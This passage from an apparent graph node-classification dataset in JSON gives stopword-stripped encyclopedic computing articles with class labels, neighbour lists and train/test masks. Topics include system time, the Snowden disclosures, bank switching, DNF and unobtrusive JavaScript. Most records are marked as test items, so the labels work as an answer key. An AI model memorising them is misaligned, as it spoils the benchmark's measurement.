set values key bits assumed correct partial key cause approximation hold high bias magnitude bias significant opposed magnitude probability procedure repeated linear approximations obtaining guesses values key bits number unknown key bits low enough attacked brute force",
    "neighbors": [
      7556,
      2567,
      3084,
      2957,
      7056,
      658,
      660,
      1173,
      1941,
      4128,
      4389,
      10662,
      169,
      11185,
      8627,
      2357,
      10806,
      1847,
      9528,
      2110,
      9156,
      9541,
      10315,
      6863,
      8273,
      7635,
      212,
      10963,
      11349,
      2265,
      7643,
      9697,
      8674,
      229,
      618,
      1898,
      881,
      1654,
      7161,
      7034,
      892
    ],
    "mask": "Test"
  },
  {
    "node_id": 9557,
    "label": 2,
    "text": "System_time:system time computer science computer programming system time represents computer system notion passage time sense time also includes passing days calendar system time measured system clock typically implemented simple count number ticks transpired since arbitrary starting date called epoch example unix posix-compliant systems encode system time unix time number seconds elapsed since start unix epoch 1 january 1970 00:00:00 ut exceptions leap seconds systems implement 32-bit 64-bit versions windows api windows 9x windows nt provide system time systemtime represented year/month/day/hour/minute/second/milliseconds value filetime represented count number 100-nanosecond ticks since 1 january 1601 00:00:00 ut reckoned proleptic gregorian calendar system time converted calendar time form suitable human comprehension example unix system time seconds since beginning epoch translates calendar time 9 september 2001 01:46:40 ut library subroutines handle conversions may also deal adjustments timezones daylight saving time dst leap seconds user locale settings library routines also generally provided convert calendar times system times closely related system time process time count total cpu time consumed executing process may split user system cpu time representing time spent executing user code system kernel code respectively process times tally cpu instructions clock cycles generally direct correlation wall time file systems keep track times files created modified and/or accessed storing timestamps file control block inode file directory first-generation personal computers keep track dates times included systems ran cp/m operating system well early models apple ii bbc micro commodore pet among others add-on peripheral boards included real-time clock chips on-board battery back-up available ibm pc xt ibm first widely available pc came equipped date/time hardware built motherboard prior widespread availability computer networks personal computer systems track system time respect local time make allowances different time zones current technology modern computers keep track local civil time many household personal devices vcrs dvrs cable tv receivers pdas pagers cell phones fax machines telephone answering machines cameras camcorders central air conditioners microwave ovens microcontrollers operating within embedded systems raspberry pi arduino similar systems always internal hardware keep track time many controller systems operate without knowledge external time require information typically initialize base time upon rebooting obtaining current time external source time server external clock prompting user manually enter current time system clock typically implemented programmable interval timer periodically interrupts cpu starts executing timer interrupt service routine routine typically adds one tick system clock simple counter handles periodic housekeeping tasks preemption etc returning task cpu executing interruption following tables illustrate methods retrieving system time various operating systems programming languages applications values marked system-dependent may differ across implementations dates given gregorian proleptic gregorian calendar dates note resolution implementation measurement time imply precision measurements example system might return current time value measured microseconds actually capable discerning individual clock ticks frequency 100 hz 10 ms",
    "neighbors": [
      2432,
      515,
      3462,
      8582,
      5000,
      6281,
      6797,
      2062,
      8976,
      1435,
      2168,
      9245,
      9762,
      3876,
      7076,
      428,
      7341,
      10413,
      7983,
      2045,
      692,
      823,
      1849,
      4409,
      11075,
      8260,
      8644,
      8262,
      4423,
      8524,
      2512,
      3922,
      4441,
      3675,
      11229,
      5348,
      10470,
      10344,
      8298,
      1515,
      8554,
      1775,
      6639,
      7151,
      10991,
      5492,
      10484,
      3960,
      5754,
      3197
    ],
    "mask": "Test"
  },
  {
    "node_id": 9558,
    "label": 4,
    "text": "Commentary_on_Edward_Snowden's_disclosure:commentary edward snowden disclosure commentary edward snowden disclosure part reactions global surveillance disclosures made edward snowden june 8 2013 director national intelligence dni james r. clapper denounced reckless disclosures intelligence community measures used keep americans safe condemned leaks done huge grave damage u.s. intelligence capabilities later month u.s. president barack obama dismissive snowden saying 'm going scrambling jets get 29-year-old hacker early august obama said snowden patriot americans would better remained unaware nsa surveillance activities snowden revealed obama also said called thorough review surveillance operations mr. snowden made leaks ... preference think american people preference would lawful orderly examination laws thoughtful fact-based debate would lead us better place august 4 chairman joint chiefs staff martin dempsey said weekly abc interview show week snowden caused us considerable damage intelligence architecture adversaries changing way communicate september dni clapper acknowledged snowden may done public service started needed debate balance privacy security loath give credit happened egregious think clear conversations generated debate actually probably needed happen said unfortunate n't happen time ago good side january 29 2014 dni clapper gave public testimony session senate intelligence committee asked snowden accomplices return purloined nsa documents clapper asked whether word accomplices referred journalists clapper spokesperson shawn turner responded director clapper referring anyone assisting edward snowden threaten national security unauthorized disclosure stolen documents related lawful foreign intelligence collection programs late june 2013 former us president jimmy carter said obviously violated laws america responsible think invasion human rights american privacy gone far ... think secrecy surrounding invasion privacy excessive think bringing public notice probably long term beneficial earlier month former vice president dick cheney suggested snowden might spy working chinese government former u.s. intelligence officials speculated chinese russian intelligence agents might gleaned additional classified material snowden view shared former russian agents snowden however told journalist glenn greenwald july never gave information either government never took anything laptops stewart baker former nsa general counsel early 1990s said july 18 2013 hearing afraid hyped distorted press reports orchestrated edward snowden allies may cause us – nations – construct new restraints intelligence gathering restraints leave us vulnerable another security disaster former cia nsa chief general michael hayden late june 2013 welcomed public debate balance privacy security leaks provoked convinced american people know exactly balance privacy security know comfortable feel september 2013 hayden stressed indisputable legality nsa called snowden troubled young man albeit morally arrogant tremendous degree also said prospects russia suspect end like rest defectors went old soviet union isolated bored lonely depressed -- ended alcoholics speaking university connecticut april 23 2014 former u.s. secretary state hillary clinton insinuated found snowden motives suspicious emerged absconded material puzzled protections whistle-blowers concerned wanted part american debate could said struck as—i honest you—as sort odd would flee china hong kong controlled china would go russia—two countries difficult cyberrelationships put mildly clinton added think turning lot material—intentionally unintentionally—drained gave kinds information big countries networks terrorist groups like hard time thinking somebody champion privacy liberty taken refuge russia putin authority reactions snowden disclosures among members congress initially largely negative speaker house john boehner senators dianne feinstein bill nelson called snowden traitor several senators representatives joined calling snowden arrest prosecution representative thomas massie one members congress question constitutional validity government surveillance programs suggest snowden granted immunity prosecution senators ted cruz rand paul offered tentative support snowden saying reserving judgment snowden information surveillance programs snowden motives known senator paul said think history looks going contrast behavior james clapper national intelligence director edward snowden mr. clapper lied congress defiance law name security mr. snowden told truth name privacy paul later called snowden civil disobedient like martin luther king jr. faced life imprisonment representative john lewis made comparisons snowden gandhi saying leaker appealing higher law senator bill nelson edward snowden amounts act treason similar comments also made rep. peter t. king rep. john boehner sen. dianne feinstein july 25 us senate committee appropriations unanimously adopted amendment senator lindsey graham fiscal year 2014 department state foreign operations related programs appropriations bill would seek sanctions country offers asylum snowden response information release snowden rep. justin amash r-mich. rep. john conyers d-mich. proposed amendment national defense authorization act curtail nsa gathering storage personal records house rejected narrow margin 205–217 amash subsequently told fox news snowden whistle-blower told us need know sunday abc interview show week rep. dutch ruppersberger d-maryland united states house select committee intelligence asked raddatz efforts thwarted trying get information members congress replied ... ince incident occurred snowden 've three different hearings members democratic caucus republican caucus general alexander come deputy chris inglis ask questions people relates information continue 're trying get american public know going ... better educate caucus democratic caucus 're trying declassify much u.s senator john mccain r-az said august 11 edition fox news sunday snowden become hero young americans reminded jason bourne character mccain attributed generation change lack confidence federal government right kind generational change said young americans trust government gordon humphrey conservative republican senator new hampshire 1979–1991 expressed support snowden glenn greenwald revealed humphrey former member senate foreign relations committee contact snowden via email humphrey told snowden provided leaked information would put harms way intelligence agent believe done right thing exposing regard massive violation united states constitution humphrey cited snowden courageous whistle-blower tom mcclintock r-calif came favor amnesty snowden saying think would best american government granted amnesty get back america answer questions without threat prosecution ... good laws sharing secrets broke laws hand broke good reason laws used direct contravention 4th amendment rights americans arizona senator john mccain criticized politicians voted favor patriot act outraged nsa spying phone calls saying passed patriot act passed specific provisions act allowed program take place enacted operation members congress know voting think responsibility lot government glenn greenwald one journalists received documents praised snowden done service revealing surveillance american public john cassidy new yorker called snowden hero said revealing colossal scale us government eavesdropping americans people around world snowden performed great public service outweighs breach trust may committed cnn columnist douglas rushkoff also called snowden leak act heroism amy davidson writing new yorker thankful overdue conversation privacy limits domestic surveillance american political commentators public figures noam chomsky chris hedges michael moore cornel west glenn beck ref name= michael moore/glenn beck /ref matt drudge alex jones andrew napolitano oliver stone michael savage stephen walt praised snowden exposing secret government surveillance commentators critical snowden methods motivations jeffrey toobin example denounced snowden grandiose narcissist deserves prison writing new yorker toobin argued programs exposed illegal therefore snowden whistleblower toobin questioned whether government function employees contractors take upon sabotage programs ’ like editors bloomberg news argued government ought prosecute snowden media focus snowden took attention away issues u.s. government surveillance interpretations patriot act foreign intelligence surveillance act fisa court actions really matters greenwald accused media u.s. focusing edward snowden instead wrongdoing director national intelligence james r. clapper u.s. officials op-ed author alex berenson argued federal government flown representative hong kong ask snowden give testimony front u.s. congress offer fair criminal trial view preventing unintended disclosures classified information countries cybersecurity scholar peter singer divided material disclosed snowden three categories smart useful espionage enemies united states legally questionable activities involved us citizens backdoors fudging policy/law un-strategic stupid actions targeting american allies huge blowback us standing us business postulated differing ways people viewed snowden could explain polarizing singer also spoke double legacy nsa revelations released snowden one hollowed american ability operate effectively ensuring future internet way would hope would huge long-term consequences second hammer-blow american technology companies cloud computing industry example recent estimate 'll lose 36 billion worth business surveys conducted news outlets professional polling organizations found american public opinion divided snowden disclosures polled canada europe supportive snowden respondents u.s june 2013 emnid survey 50 percent germans polled considered snowden hero 35 percent would hide homes october 2013 67 percent canadians polled considered snowden hero 60 percent uk respondents april 2014 uk yougov poll 46 percent british people thought newspapers reporting materials given snowden good society 22 percent thought bad society 31 percent n't know january 1 2014 editorial board new york times praised snowden whistleblower wrote favor granting clemency arguing snowden may broken law done country great service bringing abuses nsa light someone reveals government officials routinely deliberately broken law wrote person face life prison hands government times cast doubt claim made snowden critics damaged national security concluded request president obama discontinue vilification snowden give incentive return home article garnered unusual amount blowback editorial responses multiple media outlets guardian called pardon editorial coincidentally published day saying snowden allowed return home dignity january 4 2014 article peter baker new york times laid polarization opinions throughout u.s. impetus toward clemency gained public reaction snowden revelations yet despite growing backlash government surveillance baker noted calls leniency made little headway white house justice department national security establishment september 2016 editorial board washington post characterized issue whether snowden deserved presidential pardon complicated question president answer editors post credited snowden necessary reforms brought revelations en masse collection telephone data nsa stressed snowden separate leak information agency prism program basically defensible intelligence operations reasons face trial saying snowden hurt credibility avatar freedom accepting asylum russia editors post dismissed calls human-rights organizations clemency snowden noble purposes policy changes resulting leaks urged president pardon snowden despite post responsible publishing leaked material according guardian editorial stunned many american journalists glenn greenwald one journalists snowden initially leaked classified documents characterized post editorial act journalistic treachery cowardice noting post accepted pulitzer prize publishing snowden leaks concerning prism operations mentioned editorial amnesty international met edward snowden moscow mid july 2013 organization said disclosed patently public interest whistleblower actions justified exposed unlawful sweeping surveillance programmes unquestionably interfere individual ’ right privacy states attempt stop person revealing unlawful behaviour flouting international law freedom expression fundamental right widney brown senior director amnesty feared snowden would great risk human rights violations forcibly transferred united states urged country return snowden us michael bochenek director law policy amnesty international deplored us pressure governments block snowden asylum attempts saying unassailable right enshrined international law human rights watch said snowden able raise issue nsa mass surveillance without facing espionage charges would left united states first place human rights watch writes country snowden seeks asylum consider claim fairly protect rights international law recognizes revealing official secrets sometimes justified public interest navi pillay united nations high commissioner human rights said snowden case shown need protect persons disclosing information matters implications human rights well importance ensuring respect right privacy transparency international international association lawyers nuclear arms vereinigung deutscher wissenschaftler awarded snowden german whistleblowerpreis 2013 humanist union awarded fritz bauer prize 2013 daniel ellsberg whistleblower leaker top-secret pentagon papers 1971 stated interview cnn thought snowden done incalculable service country leaks might prevent united states becoming surveillance state said snowden acted sort courage patriotism soldier battle op-ed following morning ellsberg added american history important leak edward snowden release nsa material ... including pentagon papers ray mcgovern retired cia officer turned political activist agreed ellsberg added time today 'm feeling much hopeful democracy feeling time yesterday william binney whistleblower disclosed details nsa mass surveillance activities said snowden performed really great public service begin exposing programs making government sense publicly accountable 're snowden cited conversation reliable source allegations us hacking china binney felt transitioning whistle-blower traitor thomas drake former senior executive nsa whistleblower said feels extraordinary kinship snowden magnificent act civil disobedience exposing inner workings surveillance state public interest truly wikileaks founder julian assange hailed snowden hero exposed one serious events decade – creeping formulation mass surveillance state charges snowden revealed assange released statement asking people step forward stand snowden following president obama assurances changes planned nsa surveillance program assange said written statement obama validated edward snowden role whistle-blower shamai leibowitz leaked details fbi operation said legal threats smear campaign snowden grave mistake government really wanted keep secrets coming would well let man conscience go live life country october 2013 four us whistleblowers activists visited moscow present snowden award truth-telling titled sam adams award integrity intelligence thomas drake one presenters told reporters event us unchained constitution banning real law using secret law secret interpretations law explained snowden escape us ensure chance freedom claiming us made snowden stateless revoking passport russia leading temporary asylum country drake praised russia saying actually recognized international law granted political asylum",
    "neighbors": [
      208,
      1169,
      6344,
      3495
    ],
    "mask": "None"
  },
  {
    "node_id": 9559,
    "label": 3,
    "text": "Kathryn_S._McKinley:kathryn s. mckinley kathryn s. mckinley american computer scientist noted research compilers runtime systems computer architecture also known leadership broadening participation computing mckinely co-chair cra-w 2011 2014 mckinley received b.a computer science engineering rice university 1985 went earn m.s computer science rice university 1990 ph.d computer science rice university 1992 joined department computer science university massachusetts amherst assistant professor 1993 promoted associate professor 1999 2001 moved university texas austin associate professor 2005 promoted professor 2010 endowed professor computer science 2011 moved microsoft research principal researcher currently senior research scientist google mckinley married scotty strahan three boys cooper dylan wyatt strahan colleagues introduced first general purpose model optimization framework based dependences cache line reuse improving cache locality dense matrix algorithms using loop permutation loop reversal fusion distribution mckinley advisor ken kennedy showed use model introduce parallelism locality eliminate false sharing work selected 2014 ics 25th anniversary volume mckinley phd student emery d. berger colleagues introduced hoard c/c++ memory allocator widely used applications apple os x hoard limits contention caused multiple threads allocate free memory time avoids false sharing due memory allocation time hoard enforces provable bounds total amount fragmentation mckinley leader dacapo research group spanned nine institutions funded nsf itr 2000-2006 project produced number innovative virtual machine technologies open source tools open source benchmarks new methodologies evaluating managed runtimes benchmarking methodologies efforts led stephen m. blackburn dacapo java benchmark suite evaluation methodologies widely used academia industry evaluate java analysis optimization testing technologies blackburn cheng mckinley first perform apples-to-apples comparison garbage collection algorithms showed free-list allocators give substantial amounts locality even though require less memory compared copying algorithms allocate contemporaneous objects contiguously work sigmetrics 2014 test time award based insight blackburn mckinley designed new class garbage collectors named mark-region immix mark-region collector manages memory hierarchically using fixed sized blocks consisting lines contiguous object allocation may cross lines noblocks immix collection mixes line marking object copying single pass design delivers substantial performance benefits due smaller heap footprints improvements locality phd student michael bond received acm sigplan outstanding doctoral dissertation award 2008 february 14 2013 mckinley testified house committee science space technology subcommittee research spoke academic industry government computing research ecosystem driving innovation economic advances almost fields 2008 named acm fellow notable awards include",
    "neighbors": [
      8545,
      9932,
      5074,
      468,
      3512,
      3871
    ],
    "mask": "Test"
  },
  {
    "node_id": 9560,
    "label": 9,
    "text": "Comparison_of_JavaScript_engines:comparison javascript engines following tables compare standards support notable javascript/ecmascript engines used web browsers see list ecmascript engines full list",
    "neighbors": [
      1409,
      259,
      8068,
      3462,
      6791,
      1802,
      6154,
      10507,
      8854,
      4378,
      8605,
      7455,
      6176,
      1698,
      5031,
      3761,
      1203,
      11060,
      438,
      4920,
      1470,
      5311,
      2880,
      7871,
      9152,
      4171,
      5067,
      11087,
      339,
      84,
      4822,
      4056,
      9561,
      603,
      8923,
      8289,
      482,
      5219,
      7396,
      487,
      5483,
      9195,
      5101,
      10991,
      10097,
      10739,
      10744,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 9561,
    "label": 9,
    "text": "Unobtrusive_JavaScript:unobtrusive javascript unobtrusive javascript general approach use javascript web pages though term formally defined basic principles generally understood include javascript historically reputation clumsy language unsuitable serious application development largely due inconsistent implementations language document object model dom various browsers widespread use buggy copy-and-paste code runtime errors common difficult debug programmers ever tried fix long script behaved less way supposed scripts often failed completely browsers web developers promoting graceful degradation since 1994 recent emergence standards-compliant browsers javascript frameworks high-quality debugging tools made organized scalable javascript code possible emergence ajax interfaces made desirable whereas javascript reserved relatively simple non-critical tasks form validation decorative novelties used write large complex codebases often part site core functionality run time errors unpredictable behavior longer minor annoyances fatal flaws advocates unobtrusive javascript see part larger web standards movement much demand cross-browser compatibility driven increasing emphasis standardized markup style increasing demand rich internet applications driving movement toward better practices use javascript concept unobtrusiveness relation javascript programming coined 2002 stuart langridge article unobtrusive dhtml power unordered lists article langridge argues way keep javascript code including event handlers outside html stuart langridge since expanded upon thought book article format authors tried refine define essential elements unobtrusive paradigm david flanagan seminal javascript definitive guide says specific formula three main goals web standards project describes four benefits unobtrusive dom scripting javascript manifesto paris web conference 2007 christian heilmann identified seven rules unobtrusive javascript traditionally javascript often placed inline together html document markup example following typical way register javascript event handler html purpose html markup describe document structure programmatic behavior combining two negatively impact site maintainability like combining content presentation javascript behavior created referenced html harder use maintain example setting handlers several events single element setting event handler several elements using event delegation unobtrusive solution register necessary event handlers programmatically rather inline rather adding codice_2 attribute explicitly relevant element simply identified example codice_3 codice_4 means markup script runs page first loaded browser look relevant element set accordingly unobtrusive javascript add little possible global object global namespace environment runs scripts may override variable function created global namespace lead unexpected failures difficult debug javascript built-in explicit namespace mechanism desired effects easy produce using language facilities flanagan suggests use developer domain name dotted segments reversed single global name publish likely unique style developed java language variables functions objects kinds defined within namespace objects usually recommended use closures within namespace isolate become private variables functions well export public interface module functionality code could followed directly following module public methods could invoked either way follows way module-writer code contained private unique namespace interfere intrude upon code time writing event listener detects loading html page adds relevant listeners events page well behaviors required solve problem separating javascript functionality html markup use client-side javascript libraries jquery mootools prototype simplify process help ensure individual browser browser version implementation details hidden catered keeping javascript default namespace helps ensure unobtrusive possible sense criterion unobtrusive javascript often cited ensure added behavior degrades gracefully browsers unexpected configurations user may disabled javascript altogether requirement basic tenet web accessibility ensure javascript-enhanced websites usable people abilities disabilities users whatever computing platform get equal access site information functionality sometimes extra work involved achieving web accessibility optional extra many countries example uk equality act 2010 refer explicitly website accessibility makes illegal discriminate people disabilities applies anyone providing service public private voluntary sectors lot effort may put designing implementing slick client-side user interface unobtrusive javascript remain unobtrusive user without client-side scripting find access published information meet goal often necessary implement equivalent albeit clunkier server-side functionality available without use javascript take example webpage thumbnail images need javascript behaviours full-size images appear front page mouse rolled clicked first server-side markup ensure relevant full-size image served users without javascript click thumbnail case basic html markup may look like following thumbnail work without javascript unobtrusive javascript case page-load could find codice_5 elements class codice_6 remove page dom could find images class codice_7 attach codice_8 codice_9 event handler specified in-line provide slick behaviour example invoked event handler may send ajax request server full-size image add codice_10 page dom invoking existing css appears front existing content may become partially greyed codice_10 need close button perhaps visual 'spinner show data loading etc finally ajax data arrives handler hides spinner inserts full-size image new codice_10 display way client-side functionality depends javascript function function succeeds begins removing basic manual behavior goes add client-side scripted behavior script fails whatever reason manual behavior remains place remains functional though essence unobtrusive javascript concept added separate behavior layer advocates paradigm generally subscribe number related principles",
    "neighbors": [
      1152,
      6403,
      8068,
      3462,
      6791,
      522,
      1802,
      6154,
      8854,
      8605,
      6176,
      1698,
      803,
      5031,
      5677,
      1203,
      438,
      4920,
      1470,
      5311,
      2880,
      7871,
      5067,
      339,
      10581,
      4056,
      9560,
      8923,
      8289,
      482,
      9195,
      5101,
      10991,
      124,
      10739,
      5622,
      10744,
      7802,
      2556,
      6397
    ],
    "mask": "None"
  },
  {
    "node_id": 9562,
    "label": 2,
    "text": "Bitnami:bitnami bitnami library installers software packages web applications development stacks well virtual appliances bitnami sponsored bitrock company founded 2003 seville spain daniel lopez ridruejo erica brescia bitnami stacks used installing software linux windows mac os x solaris vmware acquired bitnami may 15th 2019 bitnami stacks available web applications wordpress drupal joomla redmine abantecart prestashop magento mediawiki many others addition application stacks include software required run application example wordpress stack include wordpress well mysql database manage data apache web server serve pages openssl library basic cryptographic functions phpmyadmin administer mysql bitnami installers released apache license 2.0 using automated cloud computing management bitnami offers users automated application deployments open source server apps oracle cloud amazon ec2 azure google cloud platform servers since july 2009 bitnami also offers ready-to-run virtual machines contain minimal configured linux operating system bitnami offers open source applications modules xampp package developed apache friends distinct difference installation bitnami installers native installs e.g rpms debs linux installed way prevent interference existing software libraries multiple applications installed web server considerations resolving conflicts specific ports must made february 13 2009 bitnami announced release enano cms web stack unique according bitnami enano cms project stack module first externally developed february 2010 bitnami announced release bitnami cloud hosting service allows deploying bitnami stacks amazon ec2 cloud automatic monitoring backups may 15 2019 vmware announced intent acquire bitnami",
    "neighbors": [
      4194,
      6153,
      5067,
      4236,
      3182,
      1935,
      5198,
      9806,
      11410,
      1813,
      11221,
      823,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 9563,
    "label": 2,
    "text": "Bank_switching:bank switching bank switching technique used computer design increase amount usable memory beyond amount directly addressable processor used configure system differently different times example rom required start system diskette could switched longer needed video game systems bank switching allowed larger games developed play existing consoles bank switching originated minicomputer systems many modern microcontrollers microprocessors use bank switching manage random-access memory non-volatile memory input-output devices system management registers small embedded systems technique common 8-bit microcomputer systems bank-switching may also used work around limitations address bus width hardware constraint prevents straightforward addition address lines control-oriented microprocessors use bank-switching technique access internal i/o control registers limits number register address bits must used every instruction unlike memory management paging data exchanged mass storage device like disk storage data remains quiescent storage memory area currently accessible processor although may accessible video display dma controller subsystems computer bank switching considered way extending address bus processor external register example processor 16-bit external address bus address 2 65536 memory locations external latch added system could used control two sets memory devices 65536 addresses could accessed processor could change set current use setting clearing latch bit latch set cleared processor several ways particular memory address may decoded used control latch processors separately-decoded i/o addresses output address may decoded several bank-switching control bits could gathered register approximately doubling available memory spaces additional bit register external bank-selecting latch register directly connected program counter processor automatically change state program counter overflows detected external latch since program counter internal register processor extra memory seamlessly available programs internal registers processor remain original length processor directly span bank-switched memory example incrementing internal register instead processor must explicitly bank-switching operation access large memory objects limitations generally bank-switching system one block program memory common banks matter bank currently active part address space one set memory locations used area would used hold code manages transitions banks also process interrupts often single database spans several banks need arises move records banks sorting one bank accessible time would necessary move byte twice first common memory area perform bank switch destination bank actually move byte destination bank computer architecture dma engine second cpu bank access restrictions differ whichever subsystem transfer data directly banks used unlike virtual memory scheme bank-switching must explicitly managed running program operating system processor hardware automatically detect data currently mapped active bank required application program must keep track memory bank holds required piece data call bank-switching routine make bank active however bank-switching access data much faster example retrieving data disk storage processors 16-bit addressing 8080 z80 6502 6809 etc commonly used early video game consoles home computers directly address 64 kb systems memory divide address space number blocks could dynamically mapped parts larger address space bank switching used achieve larger address space organizing memory separate banks 64kb blocks various sizes switched via bank select registers similar mechanisms cromemco first microcomputer manufacturer use bank switching supporting 8 banks 64kb systems using bank switching caution required order corrupt handling subroutine calls interrupts machine stack contents memory temporarily switched cpu inaccessible processor could used hardware video display dma i/o devices etc cp/m-80 3.0 released 1983 z80-based trs-80s model 4 model ii supported bank switching allow use 64k memory 8080 z80 processor could address bank switching allowed extra memory functions added computer design without expense incompatibility switching processor wider address bus example c64 used bank switching allow full 64kb ram still provide rom memory-mapped i/o well atari 130xe could allow two processors 6502 antic access separate ram banks allowing programmers make large playfields graphic objects without using memory visible cpu microcontrollers microprocessors significant input/output hardware integrated on-chip may use bank switching example access multiple configuration registers on-chip read/write memory example pic microcontroller allows short instruction words save space routine program execution cost extra instructions required access relatively infrequently used registers used system configuration start-up 1985 companies lotus intel introduced expanded memory specification ems 3.0 use ibm pc compatible computers running ms-dos microsoft joined versions 3.2 1986 4.0 1987 specification became known lotus-intel-microsoft ems lim ems form bank switching technique allows 640 kb ram defined original ibm pc architecture letting appear piecewise 64 kb window located upper memory area 64 kb divided four 16 kb pages independently switched computer games made use though ems obsolete feature nowadays emulated later microsoft windows operating systems provide backwards compatibility programs later extended memory specification xms also obsolete standard principle simulating bank switching memory 1 mb called extended memory directly addressable real mode x86 processors ms-dos runs xms allows extended memory copied anywhere conventional memory boundaries banks fixed every way works like bank switching ems perspective program uses later versions ms-dos starting circa version 5.0 included emm386 driver simulates ems memory using xms allowing programs use extended memory even written ems microsoft windows emulates xms also programs require bank switching also used video game consoles atari 2600 instance could address 4 kb rom later 2600 game cartridges contained bank switching hardware order permit use rom thus allow sophisticated games via program code equally important larger amounts game data graphics different game stages nintendo entertainment system contained modified 6502 cartridges sometimes contained megabit rom addressed via bank switching called multi-memory controller game boy cartridges used chip called mbc memory bank controller offered rom bank switching also cartridge sram bank switching even access peripherals infrared links rumble motors bank switching still used later game systems several sega mega drive cartridges 4mb size required use technique 4mb maximum address size gp2x handheld gamepark holdings uses bank switching order control start address memory offset second processor types computer video displays related technique double buffering may used improve video performance case processor updating contents one set physical memory locations video generation hardware accessing displaying contents second set processor completed update signal video display hardware swap active banks transition visible screen free artifacts distortion case processor may access memory video display hardware bank-switched parts video memory two banks video memory contain slightly different images rapidly cycling page-flipping create animation visual effects processor might otherwise slow carry directly bank switching later supplanted segmentation many 16-bit systems turn gave way paging memory management units embedded systems however bank switching still often used simplicity low cost often better adaptation contexts general purpose computing",
    "neighbors": [
      9739,
      6797,
      11539,
      7445,
      2201,
      8732,
      8494,
      7983,
      5040,
      4409,
      7999,
      6210,
      9166,
      2383,
      5840,
      5457,
      6499,
      7269,
      3050,
      8301,
      10351,
      1776,
      6129,
      7281,
      499,
      7282,
      7284,
      2811,
      5503
    ],
    "mask": "Test"
  },
  {
    "node_id": 9564,
    "label": 2,
    "text": "DNF_(software):dnf software dnf dandified yum next-generation version yellowdog updater modified yum package manager .rpm-based distributions dnf introduced fedora 18 default package manager fedora since version 22 perceived deficiencies yum dnf intended address include poor performance high memory usage slowness iterative dependency resolution dnf uses libsolv external dependency resolver dnf performs package management tasks top rpm supporting libraries dnf originally written python efforts way port c move functionality python code new libdnf library libdnf already used packagekit linux distribution-agnostic package system abstraction library even though library dnf features dnf default package manager fedora since version 22 released may 2015 libdnf library used package backend packagekit dnf also available alternate package manager mageia linux since version 6 may become default sometime future",
    "neighbors": [
      11525,
      2310,
      10760,
      2955,
      7947,
      7181,
      9487,
      2448,
      788,
      1813,
      8213,
      10900,
      6680,
      8476,
      5670,
      4775,
      6828,
      6446,
      7983,
      1842,
      823,
      2872,
      6583,
      59,
      3131,
      5819,
      190,
      10172,
      3649,
      10817,
      9671,
      5067,
      3918,
      463,
      3667,
      6227,
      7293,
      6361,
      2010,
      2401,
      1379,
      7140,
      741,
      231,
      5096,
      4841,
      6119,
      8554,
      9063,
      9324,
      9455,
      7920,
      10096,
      1138,
      1522,
      2045,
      11135
    ],
    "mask": "Test"
  },
  {
    "node_id": 9565,
    "label": 9,
    "text": "Kyma_(sound_design_language):kyma sound design language kyma visual programming language sound design used musicians researchers sound designers kyma user programs multiprocessor dsp graphically connecting modules screen macintosh windows computer kyma characteristics object-oriented functional programming languages basic unit kyma sound object note traditional music notation sound defined sound atom ii unary transform sound iii n-ary transform s.. s..s sounds sound atom source audio like microphone input noise generator unary transform modifies argument example lowpassfilter might take running average input n-ary transform combines two sounds mixer example defined sum inputs first version kyma computed digital audio samples macintosh 512k written smalltalk programming language 1986 carla scaletti champaign illinois may 1987 scaletti partitioned kyma graphics sound generation engines ported sound generation code digital signal processor called platypus designed lippold haken kurt j. hebel cerl sound group 1987 scaletti presented paper kyma demonstrated live digital sound generation platypus international computer music conference identified electronic synthesis pioneer bob moog technology watch conference report keyboard magazine one new language acknowledges distinction sound synthesis composition kyma music composition language macintosh views elements piece music structure single sound structure entire composition objects composed university illinois urbana-champaign eliminated funding plato laboratory 1989 scaletti hebel formed symbolic sound corporation order continue developing kyma digital audio signal processing hardware",
    "neighbors": [
      8544,
      9210,
      2691,
      7172,
      8393,
      5037,
      6797,
      7535,
      8958,
      3665,
      7571,
      6933,
      9783,
      7769,
      6810,
      7550
    ],
    "mask": "None"
  },
  {
    "node_id": 9566,
    "label": 3,
    "text": "Palamedes_(video_game):palamedes video game palamedes puzzle game requiring player match dice holding dice top screen using b button player change number his/her dice throw dice using button matches dice top screen wipes target dice screen player play solitaire mode computer another player tournament mode ai opponents six sides numbers dice making attempt match numbers screen eliminating challenge ports game published nes msx fm towns game boy hot-b japan-only sequel palamedes 2 star twinkles released 1991 nes hot-b featured basic gameplay elements original play field scrolling opposite direction release famitsu magazine scored game boy version game 22 40",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 9567,
    "label": 2,
    "text": "Vidix:vidix vidix video interface *nix portable programming interface unix-like operating systems allows video card drivers running user space directly access framebuffer direct graphics access extension x window system nick kurshev author vidix writes motivation creating interface resolve issue reported vladimir dergachev rfc alternative kernel multimedia api dergachev noted existing multimedia interfaces hard-coded device suggested driver developers would flexibility layer abstraction vidix born alternative linux kernel-based drivers mplayer project long time vidix lived within mplayer project later lived within mplayerxp project fork mplayer kurshev time linux many unix-like operating systems lacked quality drivers video subsystems almost technical documentation video hardware non-disclosure agreements time many programmers code drivers blindly developers became interested using vidix players asked kurshev separate mplayer project vidix became alternative set device drivers based idea direct hardware access similar microsoft directx drivers mapped accelerated video memory avoid colour-space conversion software scaling side players x window system includes direct rendering infrastructure provides similar functionality broad hardware support kurshev continued develop vidix 2007 version 1.0.0 software released",
    "neighbors": [
      10016,
      4902,
      3883,
      5867,
      7983,
      5397,
      823,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 9568,
    "label": 3,
    "text": "Delay_insensitive_circuit:delay insensitive circuit delay-insensitive circuit type asynchronous circuit performs digital logic operation often within computing processor chip instead using clock signals global control signals sequencing computation delay-insensitive circuit determined data flow data flows one circuit element another using handshakes sequences voltage transitions indicate readiness receive data readiness offer data typically inputs circuit module indicate readiness receive acknowledged connected output sending data encoded way receiver detect validity directly data safely received receiver explicitly acknowledge allowing sender remove data thus completing handshake allowing another datum transmitted delay-insensitive circuit therefore need provide clock signal determine starting time computation instead arrival data input sub-circuit triggers computation start consequently next computation initiated immediately result first computation completed main advantage circuits ability optimize processing activities take arbitrary periods time depending data requested function example process variable time completion would mathematical division recovery data data might cache delay-insensitive di class robust asynchronous circuit delay models makes assumptions delay wires gates model transitions gates wires must acknowledged transitioning condition stops unseen transitions occurring di circuits transition input gate must seen output gate subsequent transition input allowed happen forces input states sequences become illegal example gates must never go state inputs one entry exit state seen output gate although model robust practical circuits possible due lack expressible conditionals di circuits instead quasi-delay-insensitive model smallest compromise model yet capable generating useful computing circuits 